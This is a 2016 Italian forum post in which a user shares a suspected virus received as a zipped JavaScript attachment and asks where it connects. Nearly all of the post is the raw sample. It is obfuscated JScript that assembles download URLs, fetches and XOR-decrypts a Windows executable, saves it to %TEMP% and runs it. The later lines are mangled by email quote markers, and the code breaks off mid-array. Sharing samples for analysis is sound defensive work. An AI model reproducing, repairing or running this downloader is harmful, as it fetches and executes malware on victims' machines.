Discussioni su virus e antivirus
 

Virus di Agpsto

Alex 2 Ago 2016 19:12
Allego un probabile virus che è arrivato in formato compresso .zip

Si tratta di un javascript.

ATTENZIONE: LEGGETELO SOLO CON UN EDITOR DI TESTO, tipo notepad.

Sembra qualcosa che sfrutta le vulnerabilità di Explorer.

Io non riesco a capire con chi vorrebbe comunicare questo presunto
virus.

Bye
Alex

------------
VIRUS - LEGGERE SOLO CON NOTEPAD


var aMSq4 = 'if
(WScript.Path[\x22cha\x72At\x22](\x57Script.\x50ath.\x6cength-1)
\x21=\x20"2") WSc\x72ipt.\x51\x75it(0);\nvar Pe10 = "e" \x2b
"";\r\n\x76ar \x55z4 = "c\x6cos" + "";\r\nv\x61r\x20JTc3 =
\x22oF\x69le" + ""\x3b\r\nvar Pe1 =\x20\x22SaveT" + \x22"\x3b\r\n\x76ar
LU\x67 =\x20"ext" \x2b ""\x3b\r\nvar\x20RFl = "iteT" +
\x22";\r\nvar\x20Uf9 =\x20"wr" + "\x22;\r\nvar JQt \x3d "open"
+\x20"";\r\nvar XDd9 = "set" + "";\r\nvar Yu = "Char\x22\x20+
"";\r\nvar ULy = "type" + "";\r\nvar\x20KOe\x20= "ream\x22 + "";\r\nvar
HGb9 = "St" + "";\r\nvar Uh =\x20"\x44B." +\x20\x22";\r\nv\x61r Vo5 =
"O" \x2b "";\r\x0avar NJt = "D" + "";\r\nvar Gd = "A" + "";\r\nvar Sz =
"\x74" +\x20"\x22\x3b\r\nv\x61r My9 = "jec" + \x22";\r\n\x76ar Ha\x31 =
\x22\x65Ob\x22 + "";\x0d\nvar Po0\x20=\x20"\x65at"\x20+ "\x22;\r\nvar
Hy8 = "Cr" + ""\x3b\r\nva\x72\x20RFj = "join" +\x20""\x3b\r\n\x76ar Eo6
=\x20"e"\x20+ "";\r\nvar XUw = "rC\x6fd" + ""\x3b\r\nvar Fd =
"om\x43ha"\x20\x2b \x22";\r\nv\x61r Kt = \x22fr" \x2b "";\r\nvar Fx =
"gth\x22 + "";\r\nvar Jc \x3d "len" + "";\r\x0avar JVi =\x20"s\x68" +
"";\r\nvar \x52Un9 = "\x70u" +
"";\r\nfu\x6ection\x20IDg5(MGd){\x72eturn MGd;};var Ir8 = "eAt" +
"";\r\nv\x61r RVk = "od" + "";\x0d\x0a\x76a\x72 Xu4 = "cha\x72C" +
"\x22;\r\nva\x72 Ec9 = "th" + "";\r\nv\x61r SM\x653 \x3d "len\x67" +
"";\r\nvar Mk4\x20\x3d "e" + "";\r\nv\x61r AQa9 = "clos"\x20+
"";\x0d\x0afunction
Pa(V\x6b){ret\x75rn\x20Vk;};f'+''+'\x75nction\x20\x4eGe4(NSs5){return
NSs5;};var XHa \x3d\x20"ext" + "";\r\nvar IGy0 = "\x52eadT" +
"";\r\nvar DEm7 = "\x6ce" + "\x22;\r\nvar Sx = "mFi"
+\x20"\x22;\r\x0ava\x72 EHh = "ro" + "";\r\nvar Lz = "LoadF"
\x2b\x20"";\x0d\nvar Wn = "\x65n" + "";\r\nvar El\x39 = "op"\x20+
"\x22;\r\x0afuncti\x6fn\x20Eq9(Mn){return Mn;};var\x20Uq = "et\x22 +
\x22";\r\nvar S\x6d2 = "Chars" + "";\r\nvar Hf\x38 = "pe"
+\x20"";\r\nvar \x5aHh =\x20"t\x79" + "";\r\nvar Ie = "m" +
"";\r\x0av\x61r NFm = \x22rea\x22 + "";\r\nvar KKc1 =
"DB\x2eS\x74"\x20+ "";\r\nvar Zg2 = "O" +\x20"";\r\nvar VNd \x3d
"D\x22\x20+ "";\r\nva\x72 Pv4 = "A\x22 + "\x22;\x0d\nvar SXr =
"ct"\x20+ "";\r\nvar\x20Ix = "Obje" + "";\r\nvar YNs7 = "at\x65" \x2b
"";\r\nva\x72\x20Ml7 = "Cre" + "";\x0d\n\x76ar YKl\x36 = \x22h" +
\x22";\r\nvar Uj = "\x6cengt" + "";\r\nva\x72 \x59J\x68 = "h" +
"";\r\nvar Z\x66 =\x20"gt" + "";\r\nvar\x20VAy5 \x3d "len\x22 +
""\x3b\r\nvar NCr8 = "ce" + "";\x0d\x0avar If0 = "spli" + "";\r\nvar
Wv2 = "h" + \x22"\x3b\r\nvar YC\x75 = "lengt" + "";\r\nva\x72 Xg0 =
"gth\x22\x20+ "";\r\nvar LUo6 \x3d "len" \x2b "";\r\nvar RKw =
"gt\x68\x22 \x2b\x20"";\r\nvar \x4aNj6 = "len\x22 + ""\x3b\r\nvar RVp0
= "h" + ""\x3b\r\nvar Zh9 = "\x6ceng\x74"\x20+\x20"\x22;\r\nvar PNa5 =
"th" + "";\r\x0avar Lg = "l\x65ng" + "";\r\nvar Sa1 = \x22\x70" +
"";\r\nv\x61\x72 UZu1 = "Slee\x22 + "";\r\nvar Oj9 '+''+'\x3d \x2223" +
""\x3b\r\nv\x61r IDj = " 3"\x20+\x20"";\r\nva\x72 Et1 = "n\x22 +
"\x22;\r\nvar\x20\x49Lh6 = "R\x75" \x2b "";\r\nvar W\x78 = "ngth" +
"";\r\nvar Bv5 = "l\x65" + "\x22;\r\nvar Ki9 = \x22h" + "";\r\nvar
\x4da8 = "ngt" + "";\x0d\nvar \x58Uv = "le" + "";\r\nfunction
DEk0\x28Ja)\x7breturn Ja;};function\x20P\x4ah\x28MT\x6a4){re\x74urn
\x4dTj4;};var \x52Vy = "e" + "";\r\nv\x61r TZa = "os" + "";\r\nvar KCh5
= "cl" + "";\r\nf\x75nction AFy\x28UWx3){retur\x6e U\x57x3;};va\x72
\x5aZc8 = "le" + "\x22;\r\x0avar\x20\x45Tx9 \x3d "oFi" +
"";\x0d\nvar\x20S\x610 \x3d "ve\x54" + ""\x3b\r\nvar \x48\x732 = "Sa" +
"";\r\nf\x75\x6ect\x69on Go(SQn5){re\x74\x75rn SQn\x35;};var HXi6 =
\x22n" + "";\r\nvar\x20WHy5 = "io\x22 \x2b "";\r\nvar \x4dPk5 = "posit"
+ "";\r\nvar \x47\x54g = "Body" + "";\r\n\x76ar Ih2\x20= "ons\x65" +
"";\r\n\x76ar MUc1 = "sp" + ""\x3b\r\nvar Y\x5ab \x3d "Re"
+\x20"\x22;\r\nf\x75ncti\x6fn STv0\x28Ra0){return Ra0;};var
T\x56r3\x20=\x20"e" + "";\r\nvar \x56Tk0 = "\x77rit\x22 + ""\x3b\r\nvar
L\x4fe3 = "type" +\x20"";\r\nvar J\x57z\x33 = \x22n" +
"\x22;\r\x0av\x61r APp7 = "ope" + "";\r\nf\x75nction Xp6(Ik){return
I\x6b;};var Xf = "\x72eam" + "";\r\nv\x61r Yv \x3d "St" + "\x22;\r\nvar
\x58Os = "DB."\x20+ "";\r\x0afu\x6ection V\x773(NAa){return
NAa;};va\x72 Wt6 =\x20"O"\x20+ "";\x0d\nfun\x63\x74ion
Mf(M\x56d1\x29{re\x74urn MVd1;\x7d;v\x61r Cc0 = "D" + "";\r\nva\x72 TYj
= "A"'+''+' + "";\r\nvar Ee = "t" + "";\r\nv\x61r K\x661 =
"bjec"\x20+\x20""\x3b\r\nvar \x59j = "t\x65O"\x20+ "";\r\nvar FF\x6d
\x3d "Cr\x65a" + "";\r\nvar Lr5 = "Sleep" + "";\x0d\nvar\x20UIm = "d" +
""\x3b\x0d\nvar \x4cE\x737 = "\x73en" + "";\r\nvar BEf = "gth"\x20+
"";\r\x0av\x61r Uh6 = "len" \x2b
""\x3b\x0d\nfuncti\x6fn\x20\x4bEx3(TEw){return TEw;};var\x20Aa9 =
"\x47ET" +\x20"";\r\x0ava\x72 IDg = "open" \x2b "";\r\nfunction
Ck9\x28KFj)\x7breturn\x20KFj;};var \x49Do = "p" + "";\r\nva\x72 SDb =
"Slee" + "";\r\nvar\x20TPl =\x20"h" +\x20\x22";\r\nva\x72 L\x4cl3 =
\x22le\x6egt" + "";\r\nvar\x20RRi8 =\x20\x22ect" + "";\r\nvar Aj
=\x20"eObj" + \x22";\r\nvar Dr \x3d "Creat" + "";\r\nvar ZFt = "gth" +
"";\r\nv\x61\x72 B\x768 = "l\x65n" + "";\r\nfunction Zk(KHz9){return
KHz9;};var W\x692 = "P" +\x20"";\r\nvar Sk = "M\x4cHTT" \x2b "";\r\nvar
Ze = "2.X" + "";\r\n\x76ar NCa \x3d \x22MSXML" + "";\x0d\nva\x72
NId\x31\x20\x3d ".1" + "";\r\nva\x72 Xx4 = "t.5" +\x20"";\r\nvar GWy =
"es" + "";\r\nv\x61r Bq1\x20= "Re\x71u" + "";\r\nvar \x4cf7 = "tp" +
"";\r\nvar K\x666 = "Ht\x22 + "";\r\nvar Aw = "in" + "";\r\nv\x61r Bv7
= "tp.W" + \x22";\r\nv\x61r \x50An =\x20"Ht" + \x22";\r\nvar ZAe =
\x22Win" + ""\x3b\r\nvar I\x46m4 = "/" + "";\r\nvar Pr\x310 \x3d
\x22789+\x22 + "";\r\nvar V\x46a = "23456" + "";\r\nvar CCz = "01" \x2b
"";\x0d\x0avar Wv = "vwxyz" +\x20""\x3b\r\x0avar '+''+'Pd9 \x3d
"\x72st\x75" + "";\r\nvar VHo \x3d "mnopq" + "";\r\nvar\x20VBk = "ijkl"
+ "";\r\nvar Cc = "gh" + "";\r\n\x76\x61r\x20Dv6 = "\x62cdef" +
"";\r\nvar Ms = "WXYZa" + ""\x3b\r\x0avar \x59Vo = "RSTUV"
+\x20"";\r\x0avar Ml =\x20"M\x4eOPQ" + "";\r\nvar Lm = "IJKL" +
"\x22;\r\nv\x61r Pr\x31 \x3d "FGH" + "\x22;\r\nvar Zo\x20= "ABC\x44E" +
"";\r\x0avar USw = \x22x\x65" + "";\r\nv\x61r IFj0\x20= ".e\x22 +
""\x3b\r\nfu\x6ection Jl\x28ZYi){\x72\x65turn ZY\x69;};var Uh8 =
"d\x6a" + "";\r\n\x76ar LV\x64 = "R7\x22 +\x20"";\r\nvar\x20DTv \x3d
"pVW" + "";\r\nv\x61r \x52h1 = "e3" +\x20"";\r\nvar RGn =\x20"XN" +
"";\r\x0afuncti\x6fn Jn9(Jm3){return Jm3;};v\x61r ZSf = "%/" +
"";\r\nvar\x20PEc = "%T\x45M\x50" + "";\r\nvar \x53Sq = "ell" \x2b
"";\r\nvar DWb8 = "pt.Sh\x22 + "";\r\nvar Ot8 = "WScri" +
"";\r\nfunction Up(Wr6){ret\x75r\x6e W\x726;};var Zu = "\x74" +
""\x3b\r\nvar As3 = "jec" +\x20\x22";\r\x0avar LF\x70\x20= "ateOb" +
"";\r\nvar \x52Je4 = \x22Cre\x22 + "";\r\nvar IVm = \x22v"
\x2b\x20"";\r\nvar Hh = "4\x7ao4c" + "";\r\nvar RG\x6c2 = \x22qk" +
"";\r\nvar NLs = "l/" + "";\r\nvar Wc = "j.p" + "";\r\nvar Lq3 = "fu" +
"";\r\nvar X\x735 \x3d "gra" + "";\r\nvar Oj\x32\x20= "f\x6fto" +
"";\r\nvar Dt6 = \x22//" + "";\r\nvar R\x695 = "p:" \x2b ""\x3b\r\nvar
Yy1 = "htt" + "";\x0d\x0avar Ae = "\x362"\x20\x2b \x22";\r\nvar Cl8 =
"cn" + "'+''+'";\r\x0av\x61r Un = "\x6ccou" + "";\r\nfunctio\x6e
RTo2(Xh\x31){retur\x6e Xh1;};var L\x728 =\x20".c\x6fm/" + "";\r\nva\x72
QRy5 = ******* \x20+ "";\r\nvar MSc5 = "oi" +\x20"";\r\n\x76a\x72 NAm9
\x3d "w.gi" + \x22\x22;\r\n\x76ar Qq = "//w\x77\x22 +
"";\r\nvar\x20WSb0 \x3d "p\x3a" + "\x22;\r\nfunction
Rj3\x28TXh\x29{return T\x58h;};var Sj5\x20= "htt" + "\x22;\r\n\x76ar
FYs1 = "nt3" + "";\r\nvar Nn5 = \x2243" + "";\r\nvar Cy5 = "/07"\x20+
\x22";\r\nvar Po = "et"\x20+ "";\r\nv\x61\x72 RWi =\x20".n" +
"";\r\nv\x61r Wn\x31 = "\x61na"\x20+ "";\r\nvar Nl = ".b\x61g" +
"";\r\n\x76ar Qc4\x20=\x20\x22ww" + \x22";\r\nva\x72\x20\x45i =
\x22\x2fw"\x20+ "";\r\nvar Kx2\x20= \x22:/"\x20+ "";\r\nvar S\x55f2 =
"http" + ""\x3b\r\x0avar Lc = "7\x22 \x2b ""\x3b\r\nvar Ep3\x20= "43" +
"";\x0d\n\x76ar Vh = "th" + "";\r\n\x76ar \x57Kb = "leng" +
"";\r\n\x66unction Su(S\x48\x764){return SHv4;};var Xt6 = "VV\x22
+\x20"";\r\nvar MS\x6c = \x22\x56V" + "";\r\nvar\x20Te\x31 = "VVVVV" +
"";\r\nvar Zs5 = "VV" + \x22";\r\nvar \x43Z\x698 = "fd" + "\x22;\r\nvar
KJd \x3d "s\x64fas" + "";\r\n\x76ar\x20\x44v3 = "asfa" + "";\r\nv\x61r
OOh = "h"\x20+ "";\r\nvar\x20Ud\x38\x20= \x22gt" + "";\r\x0avar FOp3
=\x20"len\x22 + "";\r\nfunctio\x6e Zb1(CZq){\x72\x65turn CZq;\x7d;var
Pa1 = "V" + "";\r\nv\x61r G\x734 = "VVVVV" + ""\x3b\r\nvar TXe8 =
"VV"\x20+ "";\r\x0avar\x20H\x4dr4 = "\x56VVVV" + "";\r\nvar Ol = "VVV"
+ "";\r\nvar\x20'+''+'ZDo7 = "VVV\x56\x22 + "";\r\nvar\x20YUc = "VV" +
"";\r\nvar Xc6 = "VV" + "";\r\nvar Wp = "VVVVV\x22 + "";\r\nvar Ca8 =
"VVVVV" + "";\r\nv\x61r Dh5 =\x20"VVV" + "";\r\nv\x61r EGw = "VV" \x2b
"";\r\nvar \x4dj = "V\x56VVV" + "\x22;\r\n\x66unct\x69on
Oq(\x50f0){r\x65turn Pf0;\x7d;function S\x47v\x28KLy5)\x7bre\x74urn
KLy5;}\x3bfu\x6ect\x69on JQu(KKh4){return K\x4bh4;};var OX\x769 = "gth"
+ "";\r\nv\x61r Q\x53c\x20=\x20\x22le\x6e\x22 + \x22";\r\nva\x72 EYf =
"VVV" +\x20"\x22;\r\n\x76ar IIk2 = "VV" + "";\r\n\x76ar CZy = "VV" +
"";\r\nvar Jl9 = "VVVVV" +\x20"";\r\nfunction \x49f(YBe){return
YBe;};var Kg = "\x3132" +\x20"";\r\nvar \x42S\x734 = "\x31123" +
"";\r\nvar \x4dz9=(B\x53s4 + If(Kg\x29,\x20Jl\x39 + CZy + IIk2 +
(function NKy0\x28){return EY\x66;}()));\r\nvar Te=Mz9[QSc +
O\x58v9];\r\nvar NVd=\x28Mj \x2b (function Oi5(){return EG\x77;}()\x29
+ Dh5 \x2b Ca8 + (function EPo\x28){retur\x6e \x57p;}()) + \x58c6 +
Zb1(YUc) +\x20ZDo7 + \x4fl + HMr4 + \x54Xe8 +\x20\x47s4 + Pa1);\r\nvar
Gz = 672\x316\x38;\r\nvar Id=N\x56\x64[QSc + OXv9];\r\nvar Pe0=(Dv3 +
KJd +\x20\x28fu\x6ection IMn(){return CZi8\x3b}()), Zs5 + Te1 +
S\x75(\x4dSl) \x2b Xt6);\r\nvar UWy4=Pe0[QSc + (\x66unction
LBy(){return \x4f\x58\x769;}())];\r\n\r\nvar GRx5=1;\r\nvar
DAe=2;\r\nvar Ya=3\x3607 -\x203605;\x0d\nvar U\x4dc="437";\r\n\r\nvar
ERb='+''+'\x5bSUf2+Kx2 + (function Fb(){ret\x75r\x6e
Ei;}(\x29)+Q\x634+(f\x75nction\x20Zq9(){\x72eturn
Nl\x3b}())+Wn1+RWi+Po+C\x795 + Nn5+(function GNn(){return
FYs1;}()),\x20Rj\x33(Sj5)+\x57\x53b0+(fun\x63tion Ry0(){return
Qq;}()\x29+NAm9+MSc5 + QRy5+RTo2(Lr\x38)+Un+C\x6c8+Ae, Yy1\x20+
Ri5+(function X\x6c2(){return Dt6;}(\x29\x29+Oj2+Xs5 +
Lq3\x2bWc+(function Ii(){retur\x6e NLs\x3b}()) +
RG\x6c2+Hh+IVm];\r\nvar Ba5=WScript[RJe4 + LFp + As3 + (\x66unct\x69on
Wc\x36(){return Zu;\x7d())](Ot8 + D\x57b8 +
SSq);\r\nvar\x20Mz=B\x615.\x45xpandEnvi\x72\x6fnmentStrings(Jn\x39\x28PEc)
+ Z\x53\x66);\r\x0a\x76\x61\x72 \x52J\x702\x3dMz + RG\x6e + R\x681 +
Jl(D\x54v) \x2b (function GOk\x28){return LVd;}()) \x2b Uh8;\r\nvar
RCn=RJp2 + I\x46j0 + USw;\r\n\r\nfunction uheprng() {return
(function()\x20{\x0d\nva\x72 o =\x2048, c = 1, p = \x6f, s = \x6eew
Arra\x79(o);\r\n\x76\x61r \x69,j\x3b\x0d\nvar \x62ase64char\x73 =
"ABCDEFGHIJKLMNOPQRSTU\x56WXYZabcdefghijklm\x6eopqr\x73tuvwxyz0123456789+/\x22;\r\nvar

mash = Mash(\x29;\r\x0afor (i = 0; i < \x6f; i++) \x73[i]
=\x20mash(Gz);\r\nmash\x20= null;\r\nvar ra\x6edom = f\x75nction( range
) {\x0d\x0a\x72eturn\x20Math\x2eflo\x6fr(range * (rawprng() +
(rawp\x72ng(\x29 * 0x200000 | 0\x29 *
1.1102230246\x3251565e-16\x29);\r\n}\r\n
\r\nfunction\x20r\x61wprng() {\r\ni\x66 (++p >= o'+''+') \x70 =
0;\r\nvar t \x3d 176\x38863 *\x20s[p] \x2b c *
2.32830\x36436538696\x33e-10;\r\nret\x75rn s\x5b\x70] = t - (c
\x3d\x20t | 0);\r\n}return random;}\x28));\x7d;\r\n\r\nfuncti\x6fn
Ma\x73h() {\r\nvar n = 0xefc82\x349d;\r\nvar mash = functi\x6fn(data)
{\r\nif ( data ) {\r\ndata = data.toS\x74rin\x67();\r\nfor (var i = 0;
i \x3c d\x61ta.length; i++) {\r\nn +=
d\x61t\x61.charCodeAt\x28i);\r\nvar h = 0.02519603282\x341\x36938\x20*
n;\r\nn\x20= h\x20>\x3e> \x30;\r\nh -= n;\r\nh *= n;\r\nn = h
>>>\x200;\r\n\x68 -= n;\x0d\nn\x20+= h * 0x100000000;\r\n}\r\nreturn (n >>> 0)
>>> * 2.3283\x3064365386963e\x2d10;\r\n} else\x20n =
>>> 0\x78\x65fc8249d;\r\n};\r\nreturn mash;\r\n\x7d\r\n\r\nva\x72
>>> \x50e\x3d[ZA\x65 + PAn + Bv7 + A\x77 \x2b \x4bf6 + Lf7 + Bq1 + GW\x79 + Xx4
>>> + N\x49d1, (function Dq8(){return NC\x61;}()) + Zk(Ze) + Sk + (function
>>> BIy1(\x29{retu\x72n Wi2;}\x28))];\x0d\n\x0d\nfor (var OPj=0;\x20O\x50j <
>>> Pe[QSc + (func\x74i\x6f\x6e FTj\x28\x29{r\x65turn
>>> OXv9;}())];\x20OPj++)\r\n{\r\n\ttr\x79 \r\n\t{\r\n\t\tv\x61r
>>> Sy=WSc\x72ipt\x5b\x28functi\x6fn R\x65\x31(){return\x20\x52Je4;\x7d())\x20+
>>> (functio\x6e Mh\x28){return LFp;}()) \x2b As3 +
>>> Zu](Pe[OPj]);\r\n\t\tbreak;\r\n\t}\r\x0a\tcatch
>>> (e)\r\n\t{\r\n\t\tcontinue;\x0d\n\t}\r\n};\r\n\x0d\nvar \x55\x7a\x3d7\x3408
>>> - 7407;\r\nvar
>>> OEq6=0;\r\ndo\r\n{\x0d\n\t\x74\x72y\r\n\t\x7b\r\n\t\tif\x20(1=\x3d
>>> Uz)\r\n\t\t{\r\x0a\t\t\tif (OEq6\x20>= ERb[QSc
>>>
+\x20OXv9]'+''+')\r\n\t\t\t{\r\n\t\x09\t\tOEq6=0;\r\n\t\x09\t\tWScript[Ck\x39(SDb)

>>> +\x20IDo\x5d(100\x30);\r\n\x09\t\t}\r\n\t\t\tS\x79[\x49Dg](KEx3(Aa9\x29,
>>> ERb[OEq6++ % ERb[QSc \x2b O\x58\x769]], f\x61ls\x65);\r\x0a\t\t\tSy[LEs7 +
>>> (function Od(){re\x74urn UIm;}())]();\r\n\x09\t}\r\n\t\t\r\n\t\tif
>>> (Sy.rea\x64y\x73t\x61te < (-1915\x20+ 1919))
>>> \r\x0a\t\t{\r\n\t\t\tWScr\x69p\x74[SDb + IDo](-1310 +
>>> 1\x3410)\x3b\r\n\t\t\tcontinu\x65;\r\n\t\t}\r\n\t\t\r\n\t\tvar
>>> ARt=WScript[RJe4 + LFp + (function CY\x69(){return As3;}(\x29) + (function
>>> ELr\x34(){retur\x6e \x5au;}())]\x28TYj+Mf(Cc0)+\x57t6+X\x4fs\x20+ Yv +
>>> Xp6(Xf)\x29;\r\x0a\t\tAR\x74[IDg]()\x3b\r\n\t\tAR\x74\x5bLO\x653]=GRx5;
>>> \r\n\t\tARt[V\x54k\x30 + STv0(TVr3)](Sy[Y\x5ab + MU\x63\x31 +\x20Ih2 +
>>> \x47Tg]);\x0d\n\t\x09ARt[MPk5 \x2b WHy5 + Go(HXi6)]=1\x20*
>>> 0;\r\n\t\tARt[Hs\x32 + AFy\x28\x53a\x30)\x20+ (fun\x63tion Ix6(){\x72eturn
>>> E\x54x9;}()) + ZZc8](RJp\x32, Ya);\r\n\t\t\x41\x52t[DEk0(KCh5) \x2b
>>> TZa\x20+ PJh\x28RVy)]();\r\n\t\x0d\n\t\tvar HFz=KTb8 /* k
>>> *\x2f(RJp2)\x3b\t\t\r\n\t\tHFz=BKw(HFz);\r\n\t\tif (HFz[\x51Sc + OXv9] <
>>> 100\x20* 1\x3024\x20|| HFz\x5bQ\x53c + Oq(OXv9)] > (58 * 3 +\x2056\x29 *
>>> \x31024
>>>
||\x20!VOy7(HFz\x29)\r\n\t\t{\r\n\x09\t\tUz=1;\r\n\t\t\tcontinue;\r\n\t\x09}\r\n\t\ttry\r\n\t\t{\r\n\t\t\tVg8(RCn,

>>> HFz);\r\x0a\t\t} \r\n\t\t\x63at\x63h (e)
>>> {break;};\t\t\r\n\t\t\r\n\t\tBa5[ILh6 + Et1](R\x43n + (functio\x6e
>>> JYj5(){retur\x6e IDj;}()) + Oj9);\r\n\t\tbreak;\r\n\x09}\r\n\tcatc'+''+'h
>>> (e) {WScript[SDb\x20+ IDo](1\x3000\x29; continue;};\r\n} while
>>> (Uz\x29;\r\n\r\nWSc\x72i\x70\x74.Quit(0\x29;\r\n\r\nfunc\x74ion BK\x77(DHf1
>>> /* \x6b\x20 */)\r\n{\r\n\tv\x61r REt2;\r\n\t\r\n\tvar XPx8 =
>>> u\x68e\x70\x72ng\x28\x29;\r\x0a\tfor (var OPj=0\x3b O\x50j < DHf1[\x51Sc +
>>> \x4f\x58v9]; OPj++)\r\n\t{\r\n\t\tD\x48\x661[OP\x6a] ^=
>>> XPx8(256\x29;\r\n\t}\r\n\r\n\tvar Cm=DHf1[DHf1[Q\x53\x63 +
>>> S\x47v(OXv\x39)]\x2d4] | \x44Hf1[DHf1[Q\x53c + OXv9]-3] <<\x20(-1476 +
>>> 1484) | DH\x661[DHf1[QSc + OXv9]-2] << 16 \x7c DHf1[DHf\x31[QSc + OXv9]-1]
>>> \x3c< 24;\x09\r\n\tDHf1[If0 +\x20NCr8](HFz[QSc + OXv9]-\x34,
>>> 4);\r\n\t\r\n\tREt2=Te;\r\x0a\tfor (va\x72 O\x50j=0; OP\x6a \x3c
>>> DH\x661[QSc + OXv9]; OPj++)\r\n\t{\r\n\t\tREt2=(REt2 + DHf1[OPj]) %
>>> 0x10000000\x30;\x0d\x0a\t};\r\n\tif (\x52Et2\x20!= Cm) {retu\x72n
>>> [];}\x3b\r\n\t\r\x0a\treturn DHf1 /* \x6b\x20
>>> */;\r\n};\x0d\n\r\n\r\nfunction VOy7(DHf1 /* k
>>> *\x2f)\r\x0a\x7b\x0d\n\tif\x20(DHf1[0]==\x200x4D && DHf1[1]\x3d\x3d
>>> 0x5a)\r\n\t\x09{re\x74urn
>>>
\x74rue\x3b}\r\n\telse\r\n\t\t{return\x20fals\x65;}\r\n};\r\n\r\x0a\r\nfunctio\x6e\x20KT\x628

>>> /* k */\x28Ec)\r\n{\r\x0a var WHy0\x3dWScript[RJe\x34 + LFp + As3 +
>>> (function \x57c\x30\x28\x29{return
>>> \x5a\x75;}())](TYj+(f\x75nction\x20\x47i2(){re\x74urn
>>> Cc0;\x7d()\x29+Wt6\x2bXOs + Yv + Xf);\r\n WHy0[LOe3]=DAe;\r\n
>>> WH\x790[Sm2 +\x20Eq9\x28U\x71)\x5d=UMc /* k \x2a/;\r\n
>>> W\x48y0[IDg]()\x3b\r\n WHy0[Lz + EHh + Sx\x20+
>>> DE'+''+'m\x37](Ec);\r\n\x20 var Bw\x3dWHy0[Pa(IGy\x30)\x20+
>>> NGe4(XHa)];\r\n \x57Hy0[\x4bC\x685 + TZa + RVy]\x28);\r\n retur\x6e
>>> NFc(Bw\x29;\r\n};\r\n\r\n\r\nfunctio\x6e\x20NFc(Tf\x30)\r\n{ \r\nvar
>>> Sq=new A\x72ray(\x29;\r\n\t\r\nSq[2071 -
>>> 1872\x5d=12\x38;\r\nSq[252\x5d=129;\r\nSq[233]=130;\r\nSq[226]=\x2d370 +
>>> \x3501;\r\nSq[228]=54\x349 -
>>>
\x35317;\r\nSq[2\x324\x5d=1\x33\x33;\r\nSq[229]=1\x334;\x0d\nSq[231]=135;\r\n\x53q[-1\x3236

>>> + 1470]=136;\r\nSq[235]=-\x36251\x20+ 6\x3388;\r\nSq[5\x32\x20* 4 \x2b
>>> 24\x5d=-6678 + 6816;\r\n\x53q[239]=9\x3632\x20- 9493;\r\nSq[25\x20* 9
>>> +\x2013]=140;\r\nSq[236]=\x3141;\r\nSq[-1000 +
>>> 1196\x5d=142;\r\nSq\x5b6707\x20- 6510]=37 * 3 +
>>> 32;\r\nSq[201]=1\x344;\r\nSq[5754 -
>>> 5524\x5d=1\x345;\r\nSq[198]=146;\r\nSq[244]=-9711\x20+
>>> 9858;\r\nSq[246]=-\x38937 +
>>> 9\x30\x38\x35;\x0d\nSq[242]=14\x39;\r\nSq[7\x32\x34\x32 -
>>> 6991]=150;\r\x0aSq[24\x39]=6872 - 6721;\r\nSq[255]=15\x32;\r\nSq[28 \x2a 7
>>> \x2b
>>>
18]\x3d15\x33;\r\nSq\x5b2\x320]=154\x3b\r\x0aSq\x5b162]=155;\r\nSq[163]=156;\r\x0aSq[165]\x3d157\x3b\x0d\nSq[1090

>>> * 7\x20\x2b 729]=158\x3b\r\nSq[402]=-4162 +
>>> 4321;\r\nS\x71\x5b225]=160;\r\n\x53q[237]=-18\x332
>>> +\x2019\x393\x3b\r\nSq[243]=16\x32;\r\nSq[20 * 12 +
>>> 10]=16\x33;\r\x0aSq[2\x341]=164;\r\nSq[209]=77 * 2 +
>>> 11;\r\nSq[17\x30]=1\x36\x36;\r\nSq\x5b3079 - 2893]=167;\r\nSq[191]=83 *
>>> \x32\x20+ 2\x3b\r\nSq[897\x36]\x3d-4856 +
>>> 5025;\r\nSq[17\x32]=170;\r\n\x53q[8635 -
>>> 844\x36]=171;\r\n\x53q'+''+'[1\x388]=172;\x0d\nSq\x5b161\x5d=-6756 +
>>>
6929;\x0d\nSq[\x3171]=\x3174;\x0d\x0aS\x71[187]=\x3175;\r\nSq[9617]=17\x36;\r\x0aSq[626\x34

>>> + 3354]=177;\r\nSq[9619]=55 * 3 \x2b
>>> 13\x3b\r\nSq[9474]=1\x379;\r\nSq[\x395\x308]=9225 -
>>>
\x39045;\r\nSq[9569]=\x3181;\r\nSq[9570]=182;\r\nSq[9558]=183;\x0d\nSq[186\x338
>>> -
>>>
9081\x5d=18\x34;\r\nSq[9571]=18\x35;\x0d\nSq[9553]=186;\r\nS\x71[9559]\x3d187;\x0d\nSq[4507

>>> + 5\x3058]=\x3188;\r\nSq[9564]=189;\r\n\x53\x71[15\x3896\x20-
>>> 6333]=1\x390;\r\x0aSq[\x3541\x36 + 4\x3072]=191;\r\nSq[114\x32 * \x38 +
>>> 3\x356\x5d=85 *\x202 + 22;\r\nSq[1285 * 7 \x2b
>>> 529]=193;\r\nSq[9516]=1\x394;\r\nSq[9500\x5d=1\x395; \x20\x20
>>> \r\nSq\x5b9472]=196;\x0d\nSq[3928 +
>>> 5604]=197;\r\nSq[956\x36]=198;\r\nSq[93\x330 + 237]=199;\r\nSq[2706 +
>>> 6\x385\x36]=97 * 2 \x2b
>>> 6;\r\nSq[9556]=201\x3b\r\nSq[9577]\x3d\x3202;\r\nSq\x5b5251 +
>>> 4323]=2\x30\x33;\r\x0aSq[4346 * 2 +
>>>
876\x5d=2\x304;\r\nSq[95\x352]=205;\x0d\n\x53q[\x39580]=206;\r\nSq[9\x3575]=7962

>>> -
>>>
7755;\r\nS\x71[9576]=20\x38\x3b\r\n\x53q[9572\x5d=209;\r\nSq[9573]\x3d210;\r\nSq[\x39561]=211;\r\nSq[956\x30]=212;\r\nSq[95\x35\x34]=213;\r\nSq[9555]=21\x34;\r\nSq[9579]=2\x315;\r\nSq[\x3957\x38]=4\x37

>>> * \x34 +
>>>
28;\r\x0aSq[9496]\x3d217\x3b\r\n\x53q[9484]=21\x38;\r\nSq[9608]=219;\r\nS\x71[9604]=5823

>>> - 5603;\r\nSq[9612]=221;\r\x0aSq\x5b961\x36]=59 *\x203 +
>>> \x345;\r\nSq[\x33850 * 2 +
>>> \x31900]=223;\x0d\nS\x71[945]=224;\r\nS\x71[-5278 +
>>> 5501]=225;\r\x0aSq[915]'+''+'=226;\r\nSq[-62\x377 +
>>> 7237]=227;\r\nSq[931]=-1173 + 1401;\r\nSq\x5b237 * 4 +
>>> 1\x35\x5d=229;\r\nSq\x5b181]=-8247 +
>>> 8477;\r\n\x53q[964]=2\x331;\r\nS\x71[9\x33\x34]\x3d88 * \x32 +
>>> 56;\r\nSq[920\x5d=233;\r\nSq[937]=23\x34;\r\nSq[336 * 2 + 276]=235; \x20
